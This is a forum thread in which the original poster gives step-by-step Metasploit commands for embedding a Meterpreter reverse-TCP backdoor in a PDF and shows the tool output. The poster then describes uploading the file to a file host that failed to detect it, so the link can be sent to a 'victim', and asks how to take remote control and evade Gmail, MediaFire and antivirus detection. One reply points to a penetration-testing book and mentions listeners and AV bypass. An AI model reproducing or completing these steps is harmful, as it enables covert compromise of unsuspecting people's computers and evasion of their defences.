Jump to content
Hak5 Forums

Embedding a backdoor in a PDF file (tutorial + questions)

Recommended Posts


In this post, I am going to tell you how I embedded a backdoor in a PDF file and uploaded onto the Internet. However, there are still some obscurities that I need YOUR help with.

1. Step: Preparation
Download a random pdf file from the internet and save it to the "root directory"
(Root directory --> Go to "places" and then "Home" and put it in there)

2. Step: Forging the backdoored file
- go to terminal and execute the command "msfconsole"
- after that, execute the command "use exploit/windows/fileformat/adobe_pdf_embedded_exe"
- after that, execute the command "set payload windows/meterpreter/reverse_tcp"
- after that, execute the command "set INFILENAME PutTheNameOfThePdfFileAlongsideWithTheExtensionHere" so for example: set INFILENAME book.pdf
- after that, execute the command "set FILENAME DesiredOutputFileName.pdf" so for example: set FILENAME LovePoem.pdf
- after that, execute the command "set LHOST IpOfTheAttackerGoesHere(your ip)"
- after that, execute the command "exploit"

3. Step: Locating our creation
After the backdoor has been successfully embedded to the PDF file, it is stored somewhere in the
machine (it tells you where after the file is generated)

Open up a terminal and execute "cd FileDestinationWithoutTheFileGoesHere"

The output of the created file was:
[*] Reading in '/root/book.pdf'...
[*] Parsing '/root/book.pdf'...
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Parsing Successful. Creating 'LovePoem.pdf' file...
[+] LovePoem.pdf stored at /root/.msf4/local/LovePoem.pdf

So open up the terminal and type "cd /root/.msf4/local/"
After this command is executed, it moves our directory to the specified path.
Then, execute the command "ls" to list all the files inside the directory.

4. Step: Copying the file to desktop
After the file is located using the cd and ls commands, it has to be copied.
- Execute the command: cp /root/.msf4/local/LovePoem.pdf /root/Desktop/

5. Step: Uploading the file on the web
After the file is forged and retrieved to dekstop, it has to be uploaded to the internet.
Popular file sharing networks such as MediaFire and Gmail have recognised the infected file, but a
file sharing network called "SendSpace" didn't. You can easily upload the file there and send the
link to the victim.

So now I need your help, to answer me to these questions:
1. After the victim has downloaded the file (let's assume that the antivirus hasn't detected it), how can I gain a remote access to it? (which commands do I need to execute etc.

2. How can I prevent the infected file from being detected by Gmail and Mediafire?

3. How can I prevent the infeted file from being detected by the anti virus?

I appreciate all the time taken to read this post or answer any of the questions :D

Share this post

Link to post
Share on other sites

If this machine has modern Windows packages, I would bet my life the above file that gets extracted will be detected by an AV solution. There are ways to attempt to make it undetected which you can look into. I recommend Georgia Weidman's book: "Penetration Testing: A hands on Introduction to hacking" for further info. She covers the whole process of using metasploit in a fundamental way and bypassing AV, and also how it's done. I would look into more in WHY these exploits / payloads work instead of how to reach a specific goal. Also, in order for you to access the target machine, you will need to setup a listener on your own machine. 




Share this post

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.